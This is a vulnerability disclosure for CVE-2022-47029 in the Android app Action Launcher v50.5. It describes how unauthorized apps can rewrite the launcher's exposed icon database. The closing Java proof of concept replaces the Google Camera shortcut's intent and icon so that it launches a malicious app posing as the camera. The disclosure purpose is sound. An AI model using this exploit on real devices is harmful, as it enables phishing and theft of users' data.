Headline
CVE-2022-47029: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs
An issue was found in Action Launcher v50.5 allows an attacker to escalate privilege via modification of the intent string to function update.
Escalation of Privileges exists in Action Launcher(CVE-2022-47029)
Vendor: Action Launcher(https://actionlauncher.com/)
Affected product: Action Launcher(com.actionlauncher.playstore)
Version: 50.5
Download link:https://play.google.com/store/apps/details?id=com.actionlauncher.playstore&hl=en
Description of the vulnerability for use in the CVE:Action Launcher v50.5 allows unauthorized apps to tamper with the icons on the desktop and their corresponding apps, allowing attackers to defraud users by launching a fake UI.
Additional information: The favorite table in the exposed database stores the icon information presented on the screen such as name, icon picture, and location coordinate. The intent string in the table is used to start the MainActivity of a target app. An unauthorized app can modify the intent data to defraud users by launching a fake UI, further stealing user-sensitive information. Besides, attackers can directly manipulate the icon name, picture, and location coordinate on the desktop to replace the app to start.
poc:
public void attack_update_launcher() { //Fake a malicious app as Google Camera. When user launch Google Camera, a malicious app is start! ContentResolver contentResolver = getApplicationContext().getContentResolver(); Uri uri = Uri.parse(“content://com.actionlauncher.playstore.settings/favorites”); ContentValues contentValues = new ContentValues(); contentValues.put("title", “Camera”); //Forge a malicious Intent to launch a malicious application contentValues.put("intent", “#Intent;action=android.intent.action.MAIN;category=android.intent.category.LAUNCHER;launchFlags=0x10200000;package=com.attack” + “;component=com.attack/com.attack.MainActivity;end”); //The position of Google Camera app in Action Launcher database String[] s = {"5"}; contentValues.put("screen", 0); contentValues.put("container", -101); contentValues.put("cellX", 4); contentValues.put("cellY", 0); contentValues.put("spanX", 1); contentValues.put("spanY", 1); contentValues.put("itemType", 0); contentValues.put("iconType", 1); contentValues.put("iconPackage", “com.actionlauncher.playstore”); contentValues.put("iconResource", “com.actionlauncher.playstore:drawable/ic_allapps”); //Must update the icon filed use an icon same as Google Camera, or the Google Camera’s icon will change. Drawable drawable = getApplicationContext().getResources().getDrawable(R.drawable.attack); BitmapDrawable bd = (BitmapDrawable) drawable; Bitmap bitmap = bd.getBitmap(); ByteArrayOutputStream os = new ByteArrayOutputStream(); bitmap.compress(Bitmap.CompressFormat.PNG, 100, os); byte[] bytes = os.toByteArray(); contentValues.put("icon", bytes); contentResolver.update(uri, contentValues, "_id=?", s); }